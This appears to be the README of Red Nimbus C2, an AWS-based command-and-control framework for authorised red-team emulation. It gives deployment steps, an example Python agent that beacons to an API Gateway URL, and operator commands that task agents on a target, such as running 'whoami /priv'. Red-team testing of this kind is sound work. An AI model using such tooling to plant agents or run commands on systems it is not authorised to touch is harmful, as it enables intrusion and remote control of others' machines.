Red Nimbus C2 is a command and control framework built on AWS services including Lambda, S3, and CloudWatch.
The purpose of this tool is to enable legitimate cybersecurity practitioners to emulate advanced cyber threats. In that way, organizations can identify weaknesses and apply corrective and/or compensating controls to improve their security posture.
Check out the Pen Test HackFest presentation to learn more.
-
You are solely responsible for your use of this tool.
-
You are required to build it, deploy it, and operate it.
-
💰 🔥 You will be charged for your use of AWS resources.
-
Before utilizing this tool, ensure you have explicit written permission to assess the target network(s) from the network owner(s).
-
Additionally, you are responsible for complying with the AWS support policy for penetration testing, available here.
-
Misuse of this tool is strongly condemned by the author, and will almost certaintly result in criminal and/or legal action.
This repository is under active development.
Content is not stable at this time.
Red Nimbus C2 makes exclusive use of AWS cloud services.
For this reason, you must have your own AWS account.
Instructions on creating an AWS account are provided here.
You must install the following resources in order to build and operate Red Nimbus C2:
You can optionally use the provided Dockerfile to build a pre-configured docker container:
# build the RedNimbusC2 docker image
docker build -t red-nimbus-c2 .
# execute the red-nimbus-c2 container
docker run -it red-nimbus-c2 bashNext, configure AWS CLI with your AWS access key ID and secret access key.
See here for guidance on setting up AWS CLI.
aws configureAfter installing the needed build depdencies, you can install/deploy Red Nimbus C2 using the following commands.
- Clone the repository
git clone https://github.com/bluesentinelsec/RedNimbusC2.git- Deploy Red Nimbus C2 infrastructure to AWS using CDK
# enter the RedNimbusC2 directory
cd RedNimbusC2
# deploy RedNimbusC2 resources to AWS
make deployYour C2 URL will be found in this file after deployment:
RedNimbusC2/nimbus_c2_url.json
Optionally deploy to a specific AWS account like so; see here for info on configuring AWS CLI profiles.
make deploy AWS_PROFILE=<your_profile>
- Install the Red Nimbus C2 Operator Client
# from RedNimbusC2 directory
pip3 install -r operator_client/requirements.txt
python3 operator_client/nimbusc2.py --helpRed Nimbus C2 uses the following workflow:
- Deploy agent to target
- Issue commands using the Nimbus C2 operator client
- Cleanup when finished
We provide an example agent written in Python.
You may use this script as a reference to implement your own agent for operational purposes. Go is a good choice.
Otherwise, you are responsible for deploying the agent to your intended target.
As a reminder, always stay in scope, always follow your rules of engagement, and always get explicit written permission to execute prior to conducting your engagement.
Once the agent is on target, you can execute it as follows:
# view help
python3 agent.py --help
# start C2 loop
# get your API Gateway URL from this file:
# RedNimbusC2/nimbus_c2_url.json
python3 agent.py --url <AWS API Gateway URL>The Red Nimbus C2 operator client is provided here.
Interact with Agent Sessions
# view info about all sessions
nimbusc2.py --list-sessionsIssue Commands to Agents
# issue an agent task; will be executed by all agents by default
nimbusc2.py --set-task --cmd "exec-cmd" --args "whoami /priv"At this time you can view agent output in AWS CloudWatch.
A future enhancement will be added to integrate agent task output with the operator client terminal.
❗ To remove the Red Nimbus C2 infrastructure on AWS:
# remove nimbusc2 binaries and AWS infrastructure
# this will destroy any operational data you may have
# in S3, so be sure to backup your data before uninstalling if necessary
make destroy